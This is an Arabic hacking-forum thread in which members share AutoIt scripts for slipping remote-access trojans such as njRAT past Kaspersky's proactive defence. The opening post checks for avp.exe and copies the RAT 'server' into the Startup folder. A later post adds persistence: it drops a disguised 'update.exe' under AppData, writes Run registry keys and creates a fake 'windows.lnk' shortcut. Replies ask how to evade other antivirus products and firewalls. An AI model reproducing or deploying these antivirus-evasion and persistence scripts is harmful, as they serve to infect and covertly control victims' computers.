Follow us on Twitter Follow us on Facebook Watch us on YouTube





العودة   development-point > [ أقســـام إختراق و حماية الأجهزة ] > قسم إختراق الأجـهـزه والأيـمـيـلات


تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

السّلام عليكم جمعة مباركة نتمنّاها للجميع الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها راجعت بعض الأسطوانات عندي للغة

إضافة رد
 
أدوات الموضوع انواع عرض الموضوع
قديم منذ /02-22-2013, 01:29 PM   #1
الباتش النّائم
Creator

الصورة الرمزية الباتش النّائم

الباتش النّائم غير متواجد حالياً

 رقم العضوية : 707
 تاريخ التسجيل : Feb 2013
 العمر : 40
 الجنس : ~ ذكر
 البلد : أرض الله الواســـــعة
 المشاركات : 9
 إهتمامك : الشّيرينجـــ
 النقاط : 20
 قوة التقييم : الباتش النّائم is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
Wink تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

"أدخلـ, للتّطوير", للكاسبر, الدّفاع, الإستباقي, تخطّي

السّلام عليكم

جمعة مباركة نتمنّاها للجميع

الموضوع طرح أكثر من مرّة و جرّبت حلولا عديدة لكن للأسف أخفقت معها

راجعت بعض الأسطوانات عندي للغة AutoiT فوجدتــ أحدها يتكلّم عن العبارة الشّرطيّة if

قلت لما لا أطبّقها و أرى النّتيجة يعني " إن .....فـ"

مبدأ الفكرة:


هو أن جميع برامج البدأ تشتغل قبل الكاسبر ، يعني قبل هو ما يتحرّك يكون السّيرفر قد

ثبّت و لا مجال لمراقبته

سلبيّاتها:


لازم الشّخص المستهدف يعمل روستارت للجهاز ( يعني راح يعمل روستارت يعمل)

المتطلّبات:

*1 سيرفر كلين من الكاسبر لأيّ برنامج إختراقـ

*2 إعداداتك كاملة ( تثبيت في الرّيجيستري، مع التّشغيل و و و ....)

*3 برنامج الـ AutoiT (موجود في الموقع الرّسمي )

و لنبدأ على بركة الله بشرح الـ script المراد كتابته :

*1 نضع الشّرط : إن كان الكاسبر شغّالـ

*2 جواب الشّرط: السّيرفر لا يشتغل بل ينسخ نفسه في StartUp

يعني بمجرّد ما يشتغل الكمبيوتر يستغل السّيرفر

*3 إن كان العكس يشتغل السّيرفر مباشرة ( إضافةفقط)

الكود جاهز و قابل للإضافات


كود:
#NoTrayIcon
Opt("TrayIconHide", 1)
if ProcessExists("avp.exe") Then
FileCopy("server.exe",@startupDir)
Else
Run("server.exe")
EndIf
للعلم فقد تمّ تجربته قبل وضع هنا على Njrat و السّلام عليكم



jo'~d hg]~thu hgYsjfhrd gg;hsfv "H]ogJ ggj~',dv"






  رد مع اقتباس
قديم منذ /02-22-2013, 02:58 PM   #2
EDZw4sS!m
.:: V.I.B ::.

الصورة الرمزية EDZw4sS!m

EDZw4sS!m غير متواجد حالياً

 رقم العضوية : 20
 تاريخ التسجيل : Oct 2012
 الجنس : ~ ذكر
 البلد : #تونسي & مكشخ حربي#
 المشاركات : 617
 إهتمامك : spam
 النقاط : 80
 قوة التقييم : EDZw4sS!m will become famous soon enough

شكراً: 0
تم شكره 3 مرة في 3 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

مشكور يعطيك العافية
جاري الجربة






  رد مع اقتباس
قديم منذ /02-22-2013, 04:25 PM   #3
MR:HACK
Creator

الصورة الرمزية MR:HACK

MR:HACK غير متواجد حالياً

 رقم العضوية : 394
 تاريخ التسجيل : Jan 2013
 الجنس : ~ ذكر
 المشاركات : 100
 النقاط : 80
 قوة التقييم : MR:HACK will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

مــشـــــكور اخي

بارك الله فيك


لكن استفسار بعد اذنك

ممكن ان اضع اكثر من بروسيس حماية في السكريبت

يعني

اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ





منتظرك






  رد مع اقتباس
قديم منذ /02-22-2013, 05:54 PM   #4
ThE CrEzY
Creator

الصورة الرمزية ThE CrEzY

ThE CrEzY غير متواجد حالياً

 رقم العضوية : 535
 تاريخ التسجيل : Jan 2013
 العمر : 30
 الجنس : ~ ذكر
 البلد : M
 المشاركات : 52
 إهتمامك : الاستفادة والافادة
 النقاط : 24
 قوة التقييم : ThE CrEzY is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة mr:hack مشاهدة المشاركة
مــشـــــكور اخي

بارك الله فيك


لكن استفسار بعد اذنك

ممكن ان اضع اكثر من بروسيس حماية في السكريبت

يعني

اضع الـ ( كاسبر ) + ( افيرا ) + ( افاست ) ++ الـــخ





منتظرك
نعم فالامر سهل

كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة

بالتوفيق






  رد مع اقتباس
قديم منذ /02-22-2013, 06:07 PM   #5
MR:HACK
Creator

الصورة الرمزية MR:HACK

MR:HACK غير متواجد حالياً

 رقم العضوية : 394
 تاريخ التسجيل : Jan 2013
 الجنس : ~ ذكر
 المشاركات : 100
 النقاط : 80
 قوة التقييم : MR:HACK will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة the crezy مشاهدة المشاركة
نعم فالامر سهل

كل ما عليك ان تضيف جملة شرطية و تضع ما سيتم العمل داخل الجملة

بالتوفيق


طيب , ممكن اسماء البروسيس

لجميع انواع الحمايات ( التي لها دفاعات استباقية )





منتظرك






  رد مع اقتباس
قديم منذ /02-22-2013, 06:18 PM   #6
ThE CrEzY
Creator

الصورة الرمزية ThE CrEzY

ThE CrEzY غير متواجد حالياً

 رقم العضوية : 535
 تاريخ التسجيل : Jan 2013
 العمر : 30
 الجنس : ~ ذكر
 البلد : M
 المشاركات : 52
 إهتمامك : الاستفادة والافادة
 النقاط : 24
 قوة التقييم : ThE CrEzY is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة MR:HACK مشاهدة المشاركة



طيب , ممكن اسماء البروسيس

لجميع انواع الحمايات ( التي لها دفاعات استباقية )





منتظرك

لا اعرفها اخي للاسف ( يمكنك البحث في قوقل )







  رد مع اقتباس
قديم منذ /02-23-2013, 02:09 PM   #7
الباتش النّائم
Creator

الصورة الرمزية الباتش النّائم

الباتش النّائم غير متواجد حالياً

 رقم العضوية : 707
 تاريخ التسجيل : Feb 2013
 العمر : 40
 الجنس : ~ ذكر
 البلد : أرض الله الواســـــعة
 المشاركات : 9
 إهتمامك : الشّيرينجـــ
 النقاط : 20
 قوة التقييم : الباتش النّائم is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

MR:HACK
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ
كود:
If ProcessExists("avp.exe")
إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ
كود:
FileCopy("server.exe",@StartupCommonDir)
*2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره

قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا

كود:
FileCopy("server.exe",@StartupCommonDir,1)
و الكود ككلّ يصبح

كود:
#NoTrayIcon
Opt("TrayIconHide", 1)
If ProcessExists("avp.exe") Then
	FileCopy("server.exe",@StartupCommonDir)
Else
	FileCopy("server.exe",@StartupCommonDir,1)
EndIf






  رد مع اقتباس
قديم منذ /02-24-2013, 02:56 AM   #8
MR:HACK
Creator

الصورة الرمزية MR:HACK

MR:HACK غير متواجد حالياً

 رقم العضوية : 394
 تاريخ التسجيل : Jan 2013
 الجنس : ~ ذكر
 المشاركات : 100
 النقاط : 80
 قوة التقييم : MR:HACK will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

المشاركة الأصلية كتبت بواسطة الباتش النّائم مشاهدة المشاركة
mr:hack
---------

أيّ لغة هي ترجمة لشيئ تريده أنتـ و هنا تودّ تخطّي باقي الحمايات

بما أنّنا نعرف إسم الـ process للكاسبر الذي هو avp.exe

سنعيد كتابة السّكريب بتغيير بسيط

*1 إذا كان الكاسبر شغّالــ
كود:
if processexists("avp.exe")
إذا then

قم بنسخ ملفّ السيرفر في قائمة بداية التّشغيلـ
كود:
filecopy("server.exe",@startupcommondir)
*2 العكس else إن لم يكون شغّال يعني لو كانت حماية أخرى غيره

قم بنسخ ملف السّيرفر أيضا في قائمة بداية التّشغيلـ مع الإستبدال إذا كان موجود أصلا

كود:
filecopy("server.exe",@startupcommondir,1)
و الكود ككلّ يصبح

كود:
#notrayicon
opt("trayiconhide", 1)
if processexists("avp.exe") then
    filecopy("server.exe",@startupcommondir)
else
    filecopy("server.exe",@startupcommondir,1)
endif

اخي الكريم


هل هذا الكود يتخطى جميع الدفاعات الاستباقية للحمايات ؟!؟

و

هل يتخطى الفيروال ؟




منتظرك







  رد مع اقتباس
قديم منذ /02-23-2013, 02:15 PM   #9
الباتش النّائم
Creator

الصورة الرمزية الباتش النّائم

الباتش النّائم غير متواجد حالياً

 رقم العضوية : 707
 تاريخ التسجيل : Feb 2013
 العمر : 40
 الجنس : ~ ذكر
 البلد : أرض الله الواســـــعة
 المشاركات : 9
 إهتمامك : الشّيرينجـــ
 النقاط : 20
 قوة التقييم : الباتش النّائم is on a distinguished road

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

هذا كود إضافي من أحد الأصدقاء تستطيع به تشغيلـ سيرفر الـCyber و الـ Xtrem

تقولي لماذا هما فقط أقلّك شرطه:

* لا تفعّل خاصيّة البدأ مع الويندوز Run على البرنامج

* لا تفعّل خاصيّة الحقن

* لا تفعّل خاصيّة التّبيت بالروجيستري

السّكريبت يقوم بذلك المهم السّيرفر يكون كلين


كود:
if Not FileExists(@AppDataDir&"\Microsoft\update.exe") Then
        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")
        RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\", "work", "REG_EXPAND_SZ","%APPDATA%\Microsoft\update.exe")
        FileCreateShortcut("%APPDATA%\Microsoft\update.exe", @StartupDir & "\windows.lnk", "%APPDATA%\Microsoft\", "", "windows", @SystemDir & "\shell32.dll", "", "4", @SW_MINIMIZE)
        FileInstall("update.exe",@AppDataDir&"\Microsoft\update.exe",1)
EndIf
update.exe هو إسم سيرفرك و إختراقات موفّقة






  رد مع اقتباس
قديم منذ /02-23-2013, 02:24 PM   #10
Dr..ViRuS
Very Excellent

الصورة الرمزية Dr..ViRuS

Dr..ViRuS غير متواجد حالياً

 رقم العضوية : 573
 تاريخ التسجيل : Feb 2013
 الجنس : ~ ذكر
 المشاركات : 177
 النقاط : 69
 قوة التقييم : Dr..ViRuS will become famous soon enough

شكراً: 0
تم شكره 0 مرة في 0 مشاركة
افتراضي رد: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"

يعطيكـ العافيه ياغالي يستفيدو منو الشباب وفي كمان شفت شرح

تخطي الدفاع الاستباقي افيرا

موفق يابعدي






  رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

الكلمات الدلالية (Tags)
"أدخلـ, للتّطوير", للكاسبر, الدّفاع, الإستباقي, تخطّي

جديد قسم إختراق الأجـهـزه والأيـمـيـلات


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة

الانتقال السريع

المواضيع المتشابهه للموضوع: تخطّي الدّفاع الإستباقي للكاسبر "أدخلـ للتّطوير"
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
[ مشكله ] الدّفاع الإستباقي الباتش النّائم مشاكل وحلول إختراق الأجهزة 7 02-20-2013 12:12 AM


الساعة الآن 11:57 PM

 



Powered by vBulletin® Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
development-point